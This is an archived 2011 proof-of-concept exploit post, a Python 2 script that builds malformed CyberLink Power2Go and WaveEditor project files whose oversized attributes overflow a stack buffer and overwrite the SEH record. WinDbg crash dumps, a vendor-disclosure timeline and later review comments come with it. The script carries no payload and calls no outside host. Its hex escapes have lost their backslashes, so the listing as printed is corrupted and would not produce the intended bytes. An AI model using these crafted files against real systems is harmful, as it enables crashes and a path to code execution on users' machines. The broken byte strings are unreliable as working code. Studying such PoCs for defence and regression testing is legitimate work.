
CyberLink Stack Buffer Overflow

Posted on 09 December 2011

#!/usr/bin/python
#
# Exploit Title: CyberLink Multiple Products File Project Handling Stack Buffer Overflow POC
# by: modpr0be[at]spentera[dot]com (@modpr0be)
# Platform: Windows
# Tested on: Windows XP SP3, Windows 7 SP1 with:
# CyberLink Power2Go 7 (build 196)
# CyberLink Power2Go 8 (build 1031)
# CyberLink WaveEditor 2.0 (build 2204)
# Software Link: http://www.cyberlink.com/downloads/trials/index_en_US.html
# CVE : -
### Software Description
# CyberLink Power2Go is all-media disc burning software.
# Copy all your media to any disc with Power2Go 8! With new System Recovery tools
# and over 5000 free DVD menus to choose from on DirectorZone.com, Power2Go 8 not
# only burns everything but allows you to create pro-like DVDs, rip CDs and
# safeguard valuable data.
# CyberLink Wave Editor helps users convert audio formats when producing, editing,
# or creating backups of audio or video. This additional tool has also been included
# from PowerDirector 9 through PowerDirector 10, and is now included in Power2Go 8.
### Vulnerability Details
# Most CyberLink products use a built-in project file with their own format and
# extension. This file usually contains the recently modified project or work.
# Most of these file types contain these sections:
# <File src=
# <File name=
# Generally, those sections are filled with a source path or filename.
# Both products lead to command execution because the address of the
# SE Handler is overwritten with 0x00410041.
# Notes:
# I cannot find any good return address for WaveEditor; if you can make it
# through the hard way, kudos!!
### Vendor logs:
# 10/10/2011 - Bug found
# 10/11/2011 - Vendor contacted
# 10/11/2011 - Vendor replied and requested POC
# 10/11/2011 - POC sent to vendor
# 10/31/2011 - Vendor said the POC will be researched
# 10/27/2011 - Submitted to CERT
# 11/09/2011 - CyberLink updated the product
# 11/09/2011 - POC still works on the latest version
# 12/09/2011 - No response from vendor, POC release.
import time,sys

# Both generators below write a CyberLink project file whose <File ...>
# name= / src= attribute is thousands of bytes long.  As the header comment
# and the debugger dumps at the bottom show, the product copies that attribute
# into a fixed-size stack buffer without a length check, so the oversized value
# runs over the SEH record; the "handler" addresses in the dumps (00430043,
# 00410041) are simply the marker bytes written by this script.  No payload is
# carried - the file only crashes the parser.  The fix on the product side is
# a bounds check on the attribute length before it is copied, and a file of
# this shape makes a straightforward parser regression test.
#
# NOTE(review): in this copy every "\x.." escape is shown as "x.." (the
# backslashes were lost when the listing was captured), so the string literals
# as printed here are plain ASCII and not the bytes the author generated.  The
# script is also Python 2 (print statements, input()); it does not run
# unchanged on Python 3.

def power2go():
    """Write overflow.p2g, a Power2Go project file with an oversized File name=.

    The file is header + " " + hell + " " + body, where header is a
    normal-looking <Project>/<DataDisc> preamble, hell is a <File name="...">
    whose value is 778 filler bytes, 2+2 marker bytes (the ones that land on
    the SEH record in the dump), and 4200 bytes of padding, and body is the
    remaining <File> attributes plus the closing tags.  Calls sys.exit() if
    f.write() raises IOError; note that open() itself is outside the try.
    """
    # header for power2go
    # With the escapes restored this decodes to
    #   <Project magic="insecurity" version="101">\r\n<Information/>\r\n
    #   <Compilation>\r\n<DataDisc \r\ndiscName="INSECURITY" ... FileSystem="ISO9660_JOLIET">
    header = (
        "x3cx50x72x6fx6ax65x63x74x20x6dx61x67x69x63"
        "x3dx22x69x6ex73x65x63x75x72x69x74x79x22x20"
        "x76x65x72x73x69x6fx6ex3dx22x31x30x31x22x3e"
        "x0dx0ax3cx49x6ex66x6fx72x6dx61x74x69x6fx6e"
        "x2fx3ex0dx0ax3cx43x6fx6dx70x69x6cx61x74x69"
        "x6fx6ex3ex0dx0ax3cx44x61x74x61x44x69x73x63"
        "x20x0dx0ax64x69x73x63x4ex61x6dx65x3dx22x49"
        "x4ex53x45x43x55x52x49x54x59x22x20x0dx0ax66"
        "x69x6cx65x44x61x74x65x3dx22x6fx72x69x67x69"
        "x6ex61x6cx22x20x66x69x6cx65x54x69x6dx65x3d"
        "x22x30x22x20x0dx0ax64x69x73x63x54x79x70x65"
        "x3dx22x63x64x22x20x0dx0ax73x65x73x73x69x6f"
        "x6ex53x69x7ax65x3dx22x30x22x20x0dx0ax50x4f"
        "x57x42x75x72x6ex65x64x53x69x7ax65x3dx22x30"
        "x22x20x0dx0ax53x65x63x75x72x65x64x44x61x74"
        "x61x3dx22x66x61x6cx73x65x22x20x0dx0ax57x68"
        "x6fx6cx65x53x65x63x75x72x65x64x44x61x74x61"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax53x65x63"
        "x75x72x69x74x79x4bx65x79x53x69x7ax65x3dx22"
        "x31x36x22x20x0dx0ax48x69x64x65x46x69x6cx65"
        "x4ex61x6dx65x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax62x6fx6fx74x61x62x6cx65x3dx22x66x61x6c"
        "x73x65x22x20x0dx0ax62x6fx6fx74x46x6cx6fx70"
        "x70x79x3dx22x66x61x6cx73x65x22x20x0dx0ax62"
        "x6fx6fx74x49x6dx61x67x65x3dx22x22x20x0dx0a"
        "x61x75x74x6fx52x75x6ex45x78x65x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
        "x45x78x65x50x61x74x68x3dx22x22x20x0dx0ax61"
        "x75x74x6fx52x75x6ex49x63x6fx6ex3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e"
        "x49x63x6fx6ex50x61x74x68x3dx22x22x20x0dx0a"
        "x41x75x74x6fx53x70x6cx69x74x44x69x73x63x3d"
        "x22x66x61x6cx73x65x22x20x0dx0ax44x69x73x63"
        "x53x70x6cx69x74x3dx22x66x61x6cx73x65x22x20"
        "x0dx0ax41x75x74x6fx4fx76x65x72x42x75x72x6e"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax44x61x74"
        "x61x50x72x6ax74x6fx56x69x64x65x6fx50x72x6a"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax73x69x6d"
        "x75x6cx61x74x69x6fx6ex3dx22x66x61x6cx73x65"
        "x22x20x0dx0ax62x75x72x6ex50x72x6fx6fx66x3d"
        "x22x74x72x75x65x22x20x0dx0ax63x6cx6fx73x65"
        "x44x69x73x63x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax76x65x72x69x66x79x44x69x73x63x3dx22x66"
        "x61x6cx73x65x22x20x0dx0ax64x65x66x65x63x74"
        "x6dx61x6ex61x67x65x6dx65x6ex74x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax63x6fx70x69x65x73x3d"
        "x22x31x22x20x0dx0ax62x75x72x6ex53x70x65x65"
        "x64x3dx22x30x22x20x0dx0ax63x64x54x65x78x74"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax41x75x64"
        "x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66"
        "x61x6cx73x65x22x20x0dx0ax41x75x64x69x6fx47"
        "x61x70x54x69x6dx65x3dx22x32x22x20x0dx0ax46"
        "x69x6cx65x53x79x73x74x65x6dx3dx22x49x53x4f"
        "x39x36x36x30x5fx4ax4fx4cx49x45x54x22x3e")
    # Rest of the <File> element after the name= attribute, then the closing
    # tags.  Decodes to
    #   src="C:\abc.txt" \r\noperation="add" ... audioSubtype="0"/>\r\n
    #   </DataDisc>\r\n</Compilation>\r\n</Project>
    body = (
        "x73x72x63x3dx22x43x3ax5cx61x62x63x2ex74x78"
        "x74x22x20x0dx0ax6fx70x65x72x61x74x69x6fx6e"
        "x3dx22x61x64x64x22x20x0dx0ax62x75x72x6ex73"
        "x74x61x74x75x73x3dx22x6ex6fx74x62x75x72x6e"
        "x22x20x0dx0ax73x69x7ax65x3dx22x32x39x32x38"
        "x36x34x22x20x0dx0ax53x68x6fx77x53x69x7ax65"
        "x3dx22x32x39x32x38x36x34x22x20x0dx0ax41x6c"
        "x6cx6fx77x45x6ex63x72x79x70x74x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax53x65x63x75x72x65x64"
        "x52x6fx6fx74x3dx22x66x61x6cx73x65x22x20x0d"
        "x0ax66x69x6cx65x54x69x6dx65x3dx22x31x32x39"
        "x33x36x37x33x34x31x35x30x39x37x33x36x38x37"
        "x34x22x20x0dx0ax6fx6cx64x3dx22x66x61x6cx73"
        "x65x22x20x0dx0ax74x65x6dx70x66x69x6cx65x3d"
        "x22x66x61x6cx73x65x22x20x0dx0ax74x65x6dx70"
        "x64x69x72x6cx65x76x65x6cx3dx22x30x22x20x0d"
        "x0ax66x6fx72x61x75x64x69x6fx74x72x61x63x6b"
        "x3dx22x66x61x6cx73x65x22x20x0dx0ax74x61x72"
        "x67x65x74x41x75x64x69x6fx43x44x3dx22x66x61"
        "x6cx73x65x22x20x0dx0ax64x61x74x61x69x74x65"
        "x6dx74x79x70x65x3dx22x30x22x20x0dx0ax6dx76"
        "x70x3dx22x30x22x20x0dx0ax61x75x64x69x6fx53"
        "x75x62x74x79x70x65x3dx22x30x22x2fx3ex0dx0a"
        "x3cx2fx44x61x74x61x44x69x73x63x3ex0dx0ax3c"
        "x2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex0d"
        "x0ax3cx2fx50x72x6fx6ax65x63x74x3e")
    pgfile = "overflow.p2g"
    # NOTE(review): opened outside the try, so an open() failure is not caught
    # and the handle is not closed on the IOError path below.
    f = open(pgfile,'w')
    junk = "A" * 778                 # filler up to the exception registration record
    nseh = "x42x42"                  # marker bytes: show up as 00420042 in the dump
    seh = "x43x43"                   # marker bytes: show up as 00430043 in the dump
    sisa = "x44" * 4200              # trailing padding
    hell = "x3cx46x69x6cx65" + " "   # <File  - the tag whose name= carries the oversized value
    hell += "name=" + '"'+ junk+nseh+seh+sisa + '"'
    try:
        f.write(header+ " " + hell + " " + body)
        print "[!] Generating", pgfile, ".."
        time.sleep(1)
        print "[+] File", pgfile, "successfully created!"
        print "[*] Now open project file" +" '"+pgfile+"' " + "with CyberLink Power2Go."
        print "[*] Good luck ;)"
        f.close()
    except IOError:
        print "[-] Could not write to destination folder, check permission.."
        sys.exit()

def waveeditor():
    """Write overflow.wve, a WaveEditor project file with an oversized File Src=.

    The file is header + hell + fill: a <Project Application="WaveEditor"
    Version="2.0"> tag, a <File Src="..."> whose value is 3000 filler bytes,
    then a <BookmarkList/> and the closing/compilation tags.  Calls sys.exit()
    if f.write() raises IOError; open() itself is outside the try.
    """
    # Decodes to <Project Application="WaveEditor" Version="2.0">
    header = ("x3cx50x72x6fx6ax65x63x74x20x41x70x70x6cx69x63x61"
              "x74x69x6fx6ex3dx22x57x61x76x65x45x64x69x74x6fx72x22x20"
              "x56x65x72x73x69x6fx6ex3dx22x32x2ex30x22x3e")
    wvefile = "overflow.wve"
    # NOTE(review): same as in power2go - not closed if f.write() fails.
    f = open(wvefile,'w')
    junk = "A" * 3000                  # filler; the dump shows 00410041 in the SEH slot
    hell = "x3cx46x69x6cx65x20x53x72x63x3d"   # <File src=
    hell += '"'+ junk + '"' + "x3e"    # ... closing quote and '>'
    # NOTE(review): this first assignment is dead - it is overwritten by the
    # longer one immediately below and never written to the file.
    fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c"
            "x2fx46x69x6cx65x3ex3cx2fx50x72x6fx6ax65x63x74x3e")
    # Decodes to <BookmarkList/></File><Compilation><AudioCD burnProof="true"
    # copies="0" burnSpeed="0" AudioNormalize="false" AudioGapTime="2"/>
    # </Compilation></Project>
    fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c"
            "x2fx46x69x6cx65x3ex3cx43x6fx6dx70x69x6cx61x74x69x6fx6e"
            "x3ex3cx41x75x64x69x6fx43x44x20x62x75x72x6ex50x72x6fx6f"
            "x66x3dx22x74x72x75x65x22x20x63x6fx70x69x65x73x3dx22x30"
            "x22x20x62x75x72x6ex53x70x65x65x64x3dx22x30x22x20x41x75"
            "x64x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66x61x6cx73"
            "x65x22x20x41x75x64x69x6fx47x61x70x54x69x6dx65x3dx22x32"
            "x22x2fx3ex3cx2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex3c"
            "x2fx50x72x6fx6ax65x63x74x3e")
    try:
        f.write(header+hell+fill)
        print "[!] Generating", wvefile, ".."
        time.sleep(1)
        print "[+] File", wvefile, "successfully created!"
        print "[*] Now open project file" +" '"+wvefile+"' " + "with CyberLink WaveEditor."
        print "[*] Good luck ;)"
        f.close()
    except IOError:
        print "[-] Could not write to destination folder, check permission.."
        sys.exit()

print "[*] CyberLink Multiple Products File Project Processing Stack Buffer Overflow POC."
print "[*] by modpr0be <modpr0be[at]spentera[dot]com> | @modpr0be"
print " 1.CyberLink Power2Go <= 8.0"
print " 2.CyberLink WaveEditor <= 2.0"
# Menu loop: at most two attempts; a valid choice runs one generator and exits.
a = 0
while a < 2:
    a = a + 1
    # NOTE(review): on Python 2, input() evaluates the typed text as an
    # expression; raw_input() plus int() is the safe form.  Kept as-is.
    op = input("[!] Choose the product: ")
    if op == 1:
        power2go()
        sys.exit()
    elif op == 2:
        waveeditor()
        sys.exit()
    else:
        print "[-] Oh plz.. pick the right one :) "

### DUMP OF POWER2GO
# WinDbg session: the second exception is the one caused by the project
# file.  esi holds the 0x43 marker bytes and !exchain reports the SEH record
# overwritten with 00430043 / 00420042, i.e. the nseh/seh markers from
# power2go() - the overflow reaches the exception registration record.
#(d18.c60): Break instruction exception - code 80000003 (first chance)
#eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=07d4ffcc ebp=07d4fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc int 3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:022> g
#(d18.d40): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ec8b55ff ebx=010358b0 ecx=78ad8951 edx=005b12fc esi=00430043 edi=0012d69c
#eip=ec8b55ff esp=0012ca70 ebp=00000000 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#ec8b55ff ?? ???
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkPower2Go8Power2Go8.exe -
#0:000> !exchain
#0012ca9c: Power2Go8!CCLAuMixerAPI::operator=+156ba8 (00560dc8)
#0012d104: Power2Go8!CCLAuMixerAPI::operator=+25e23 (00430043)
#Invalid exception stack at 00420042
#0:000> d 0012d104
#0012d104 42 00 42 00 43 00 43 00-43 00 43 00 43 00 43 00 B.B.C.C.C.C.C.C.
#0012d114 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d124 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d134 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d144 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d154 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d164 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.
#0012d174 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C.

### DUMP OF WAVE EDITOR
# Here the fault is in WaveKernel.dll on a dereference of edx+8 before any
# handler runs; !exchain nevertheless shows the SEH record already replaced
# by 00410041 (the "A" filler, UTF-16 widened), which is what the header
# comment refers to.
#(e44.734): Break instruction exception - code 80000003 (first chance)
#eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
#eip=7c90120e esp=00e5ffcc ebp=00e5fff4 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
#ntdll!DbgBreakPoint:
#7c90120e cc int 3
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:016> g
#(e44.e48): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00410041 ebx=ffffffff ecx=0240868b edx=420b1802 esi=022ccbe8 edi=00d2f848
#eip=024c47af esp=0012c424 ebp=0012c42c iopl=0 nv up ei pl nz na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveKernel.dll -
#WaveKernel!ReleaseWaveKernelClient+0x12a8f:
#024c47af 8b4208 mov eax,dword ptr [edx+8] ds:0023:420b180a=????????
#Missing image name, possible paged-out or corrupt data.
#Missing image name, possible paged-out or corrupt data.
#0:000> !exchain
#0012c898: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveEditor.exe -
#WaveEditor!CCLAuMixerAPI::CCLAuMixerAPI+da61 (00410041)
#Invalid exception stack at 00410041
#0:000> d 0012c898
#0012c898 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c8f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#0012c908 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
#

 
